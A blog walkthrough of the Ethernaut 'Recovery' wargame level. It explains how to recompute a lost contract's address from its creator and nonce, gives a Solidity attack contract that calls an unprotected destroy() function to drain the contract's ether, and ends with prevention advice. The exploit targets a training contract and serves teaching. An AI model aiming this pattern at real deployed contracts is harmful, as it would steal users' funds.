# Smart Contract Hacking with Ethernaut: 17. Recovery

**Published by:** [Leek DEV](https://paragraph.com/@leekdev/)
**Published on:** 2023-09-28
**URL:** https://paragraph.com/@leekdev/ethernaut-17-recovery

## Content

Ethernaut is a wargame built by OpenZeppelin on top of the Solidity programming language; every level is a smart contract that has to be hacked.

Tutorials:

- GitHub - attack code
- Bilibili - video tutorial
- YouTube - video tutorial
- TikTok - …

### Challenge

The address of the SimpleToken contract that Recovery created has been forgotten, and 0.001 ether was sent to it. Find a way to get the ether back out.

### Hack approach

Recover the lost contract address by reproducing the address derivation. SimpleToken was created with a plain CREATE (`new`), so the derivation is easy to reproduce: the address is the last 20 bytes of keccak256(rlp([senderAddress, nonce])), where the sender is the Recovery contract and the nonce is 1, because a contract's nonce starts at 1 and SimpleToken was the first contract Recovery created. Before spending gas on the attack, confirm the computed address by checking that it holds the 0.001 ether.

### Other tricks

Call the `destroy` method: it selfdestructs SimpleToken and forwards the contract's whole balance to the address passed in, and it has no access control, so any caller can name themselves as the recipient.

### Attack code

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

// Minimal interface for the lost SimpleToken: destroy() selfdestructs the
// token contract and sends its balance to _to.
interface ISimpleToken {
    function destroy(address payable _to) external;
}

contract RecoveryHack {
    ISimpleToken public exploitInst;
    address public simpleToken;

    // _target is the Recovery contract that created SimpleToken with `new`.
    // SimpleToken was its first child, so its address is
    // keccak256(rlp([_target, nonce = 1]))[12:], and rlp([addr, 1]) is
    // 0xd6 (list, 22 bytes) 0x94 (20-byte string) <addr> 0x01, written out here by hand.
    constructor(address _target) {
        simpleToken = address(uint160(uint256(keccak256(
            abi.encodePacked(uint8(0xd6), uint8(0x94), _target, uint8(0x01))
        ))));
        exploitInst = ISimpleToken(simpleToken);
    }

    // destroy() is unprotected, so the balance goes to whoever calls attack().
    function attack() external {
        exploitInst.destroy(payable(msg.sender));
    }
}
```

Deploy RecoveryHack with the Recovery instance address as `_target`, check that `simpleToken()` equals the address holding the 0.001 ether, then call `attack()`; the balance is sent to the caller.

### Hack case

…

### Prevention

In contracts, prefer creating child contracts with CREATE2 rather than the plain `new` (CREATE) path.

Standard creation: address = keccak256(rlp([senderAddress, nonce]))[12:32], i.e. the last 20 bytes of the hash.

Caveat: a CREATE2 address is just as deterministic, keccak256(0xff ++ deployer ++ salt ++ keccak256(initCode))[12:32], so changing the creation opcode does not hide a contract from anyone who knows the deployer and the salt. What lets an arbitrary caller take the funds in this level is the unprotected `destroy` function; restricting it to the owner, and recording each created address in an event so it cannot be "forgotten" in the first place, is the fix a reviewer would ask for.

### References

- EIP-1014: Skinny CREATE2
- Recursive-Length Prefix (RLP) Serialization
- Deploying Smart Contracts Using CREATE2
- EVM CODE
- How is the address of an Ethereum contract computed?